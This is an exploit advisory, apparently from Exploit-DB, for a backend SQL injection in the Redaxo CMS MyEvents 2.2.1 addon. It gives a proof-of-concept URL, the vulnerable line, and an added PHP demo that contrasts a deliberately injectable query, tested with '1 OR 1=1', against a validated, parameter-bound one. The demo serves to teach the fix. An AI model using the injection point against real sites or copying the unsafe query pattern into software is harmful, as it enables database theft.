Redaxo CMS Addon MyEvents 2.2.1 – SQL Injection

  • Author: h0n1gsp3cht
    Date: 2018-03-07
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/44261/
  • # Exploit Title: Redaxo CMS Addon MyEvents SQL Injection [ Backend ]
    # Date: 01.03.2018
    # Exploit Author: h0n1gsp3cht
    # Vendor Homepage: http://www.github.com/wende60/myevents
    # Version: 2.2.1 (Last Version)
    # Tested on: LinuxMint
    # More: Login Required
    # GET
    
    ##############
    Vuln Code [+] redaxo/src/addons/myevents/pages/event_add.php
    ##############
    
    $myevents_id=strip_tags(rex_request('myevents_id', 'string'));
    
    ###############
    POC
    ###############
    
    http://127.0.0.1/redaxo/index.php?page=myevents/event_add&myevents_id=[SQL]
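
The line quoted under "Vuln Code" filters the parameter only with strip_tags(), which removes HTML/PHP tags and leaves SQL syntax untouched. The following is an added example, not code from the MyEvents addon: it assumes the value ends up concatenated into a query, and uses a constructed `events` table in an in-memory SQLite database (hypothetical names) to contrast that pattern with integer validation plus a bound parameter.

```php
<?php
// Added example, not code from the MyEvents addon. Table, columns and rows
// are constructed; in-memory SQLite stands in for the CMS database.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE events (id INTEGER PRIMARY KEY, title TEXT)');
$db->exec("INSERT INTO events (id, title) VALUES (1, 'Public'), (2, 'Internal')");

// Pattern from the advisory: strip_tags() only removes HTML/PHP tags,
// so SQL syntax in the value reaches the query unchanged.
function find_event_unsafe(PDO $db, string $raw): array
{
    $id = strip_tags($raw);
    return $db->query("SELECT id, title FROM events WHERE id = $id")
              ->fetchAll(PDO::FETCH_ASSOC);
}

// Hardened: accept only a positive integer, then bind it as a parameter.
function find_event_safe(PDO $db, string $raw): array
{
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return []; // reject anything that is not a plain integer id
    }
    $stmt = $db->prepare('SELECT id, title FROM events WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed inputs: a legitimate id and a value that alters the WHERE clause.
foreach (['1', '1 OR 1=1'] as $input) {
    printf("%-10s unsafe=%d row(s) safe=%d row(s)\n",
        var_export($input, true),
        count(find_event_unsafe($db, $input)),
        count(find_event_safe($db, $input)));
}
```

Within Redaxo itself, rex_request() accepts 'int' as its type argument, which gives the same integer cast at the point where the addon reads myevents_id.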